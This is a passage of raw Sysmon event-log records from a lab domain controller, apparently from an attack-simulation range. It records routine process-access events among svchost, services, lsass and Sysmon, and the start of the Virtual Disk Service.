84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001314Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.878{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001313Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.878{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001312Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.878{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001311Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.878{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001310Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.878{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001309Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.878{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001308Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.863{D28789B6-7C62-5FA1-0A00-000000008801}852940C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-3A00-000000008801}3612C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001307Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001306Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001305Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001304Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001303Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001302Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001301Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001300Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.847{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7C73-5FA1-3A00-000000008801}3612C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001299Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001298Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001297Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.847{D28789B6-7C62-5FA1-0A00-000000008801}8522484C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-3A00-000000008801}3612C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001296Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.846{D28789B6-7C73-5FA1-3A00-000000008801}3612C:\Windows\System32\vds.exe10.0.14393.2608 (rs1_release.181024-1742)Virtual Disk ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationvds.exeC:\Windows\System32\vds.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=EC0D95737DE497BA0AD2223322B21280,SHA256=DE976B547872B0919E16D5A97902B95893AD5B76DE6A11BE5F874EADBCA49F93,IMPHASH=3F541E0A1D775ACA4A7D5FBDFF8433C5{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001295Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.847{D28789B6-7C62-5FA1-0A00-000000008801}852928C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-3000-000000008801}2696C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001294Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.831{D28789B6-7C62-5FA1-0B00-000000008801}86892C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001293Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.831{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001292Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.831{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001291Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.831{D28789B6-7C62-5FA1-0B00-000000008801}86892C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001290Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.831{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3900-000000008801}3548C:\Windows\System32\vdsldr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001289Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 